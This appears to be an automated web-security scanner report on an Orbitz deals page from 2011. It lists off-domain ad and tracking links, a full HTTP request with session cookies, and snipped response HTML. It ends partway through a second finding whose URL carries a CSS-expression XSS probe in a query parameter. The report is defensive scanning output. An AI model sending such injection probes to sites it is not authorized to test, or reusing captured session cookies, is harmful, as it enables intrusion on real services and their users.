Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=allinclusive&cnt=PKH

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=allinclusive&cnt=PKH HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=ADCB5FF5653A489EAA40998DBCFB7830; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:38 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 453389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.349. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
